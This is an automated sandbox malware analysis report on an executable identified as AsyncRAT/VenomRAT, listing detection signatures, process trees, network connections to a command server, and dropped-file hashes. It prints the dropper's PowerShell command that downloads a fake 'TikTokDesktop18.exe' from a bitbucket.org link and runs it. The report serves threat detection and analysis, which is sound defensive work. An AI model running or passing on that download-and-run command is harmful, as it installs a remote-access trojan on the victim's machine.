Malware Analysis Report

2025-01-02 06:54

Sample ID 241128-1wjnysxqfp
Target 017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe
SHA256 017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1
Tags
discovery execution asyncrat venomrat default rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1

Threat Level: Known bad

The file 017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe was found to be: Known bad.

Malicious Activity Summary

discovery execution asyncrat venomrat default rat

AsyncRat

Asyncrat family

VenomRAT

Venomrat family

Blocklisted process makes network request

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Command and Scripting Interpreter: PowerShell

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Unsigned PE

System Location Discovery: System Language Discovery

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-28 21:59

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-28 21:59

Reported

2024-11-28 22:01

Platform

win7-20240903-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe

"C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\141D.tmp\141E.tmp\141F.bat C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe', 'C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe')";

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe;

Network

Country Destination Domain Proto
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.23:443 bitbucket.org tcp
IE 185.166.142.23:443 bitbucket.org tcp

Files

C:\Users\Admin\AppData\Local\Temp\141D.tmp\141E.tmp\141F.bat

MD5 1904675eec0f302424c4bde0956dab54
SHA1 267c3174e35e0e2a7d104f98b3326f313f2e464e
SHA256 45fa85497886f443950af5fbd09098407a05345925fd942ac49eda67a93657e6
SHA512 fe3682e4c1d36e14d4bb6ced55d62b609a8417a98731207246f7b9419724d5463246f641e1c4b1b53ec9358e65d7938ecc0b71f2ea09455bdb61815761e9f6f3

memory/2720-6-0x000007FEF646E000-0x000007FEF646F000-memory.dmp

memory/2720-7-0x000000001B700000-0x000000001B9E2000-memory.dmp

memory/2720-9-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp

memory/2720-8-0x0000000001DB0000-0x0000000001DB8000-memory.dmp

memory/2720-10-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp

memory/2720-11-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp

memory/2720-12-0x000007FEF61B0000-0x000007FEF6B4D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-28 21:59

Reported

2024-11-28 22:02

Platform

win10v2004-20241007-en

Max time kernel

102s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"

Signatures

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

VenomRAT

rat
Description Indicator Process Target
N/A N/A N/A N/A

Venomrat family

venomrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2080 set thread context of 4500 N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1428 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe C:\Windows\system32\cmd.exe
PID 1428 wrote to memory of 436 N/A C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe C:\Windows\system32\cmd.exe
PID 436 wrote to memory of 4408 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 436 wrote to memory of 4408 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 436 wrote to memory of 3680 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 436 wrote to memory of 3680 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3680 wrote to memory of 2080 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe
PID 3680 wrote to memory of 2080 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe
PID 3680 wrote to memory of 2080 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe
PID 2080 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2080 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2080 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2080 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2080 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2080 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2080 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2080 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2080 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2080 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2080 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Processes

C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe

"C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A894.tmp\A895.tmp\A896.bat C:\Users\Admin\AppData\Local\Temp\017f609cec9970f6cf00eb6217df3f7e38f1134c424685f6d2edf1590c17e1c1.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/superappsss/khem-praksa/downloads/TikTokDesktop18.exe', 'C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe')";

C:\Windows\system32\cmd.exe

cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe;

C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe

C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe ;

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.23:443 bitbucket.org tcp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 16.15.178.155:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 23.142.166.185.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 155.178.15.16.in-addr.arpa udp
RU 212.15.49.155:4449 tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
RU 212.15.49.155:4449 tcp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
RU 212.15.49.155:4449 tcp
RU 212.15.49.155:4449 tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
RU 212.15.49.155:4449 tcp

Files

C:\Users\Admin\AppData\Local\Temp\A894.tmp\A895.tmp\A896.bat

MD5 1904675eec0f302424c4bde0956dab54
SHA1 267c3174e35e0e2a7d104f98b3326f313f2e464e
SHA256 45fa85497886f443950af5fbd09098407a05345925fd942ac49eda67a93657e6
SHA512 fe3682e4c1d36e14d4bb6ced55d62b609a8417a98731207246f7b9419724d5463246f641e1c4b1b53ec9358e65d7938ecc0b71f2ea09455bdb61815761e9f6f3

memory/4408-2-0x00007FFE71FB3000-0x00007FFE71FB5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_snvlrfet.khw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4408-8-0x00007FFE71FB0000-0x00007FFE72A71000-memory.dmp

memory/4408-13-0x00000220FF450000-0x00000220FF472000-memory.dmp

memory/4408-14-0x00007FFE71FB0000-0x00007FFE72A71000-memory.dmp

memory/4408-18-0x00007FFE71FB0000-0x00007FFE72A71000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TikTokDesktop18.exe

MD5 e619fff5751a713cf445da24a7a12c94
SHA1 9fc67a572c69158541aaaab0264607ada70a408c
SHA256 11fbd295494309d56d775a11f805544737ce71d058a716194c0fd5b800cdc6d9
SHA512 07420c9a0336ae350567abf68d7f5ef52b34c4c010dbabae6693bf27fd5a50a8b2b16696a3bed7bdc846d542eb04ce6102d5387484f352f9d09c8789ccfcd9ae

memory/2080-22-0x000000007411E000-0x000000007411F000-memory.dmp

memory/2080-23-0x00000000005C0000-0x0000000000646000-memory.dmp

memory/2080-24-0x0000000002950000-0x0000000002956000-memory.dmp

memory/2080-25-0x000000000ABE0000-0x000000000B10C000-memory.dmp

C:\Users\Admin\AppData\Roaming\gdi32.dll

MD5 8d662564d514751028c65d96c696271f
SHA1 8e27943b7b901a808d39a7ee6977e1d3769a15fb
SHA256 86af5d6ee9d824ec2dfa73f44b9ae285d33e9748a8b6dbd4333d1ae06cf6f72b
SHA512 0a5460bbe7f43db560a08e508381613098a28de208a9d85c9c41fffa62b1e0299389a575dfa2b78767d3dd0fc73f0c88677ca32d7fe4e87698def1386cf35bef

memory/4500-32-0x0000000000780000-0x00000000007AC000-memory.dmp

memory/4500-34-0x0000000005670000-0x0000000005C14000-memory.dmp

memory/4500-36-0x0000000005370000-0x0000000005402000-memory.dmp

memory/4500-37-0x0000000005350000-0x000000000535A000-memory.dmp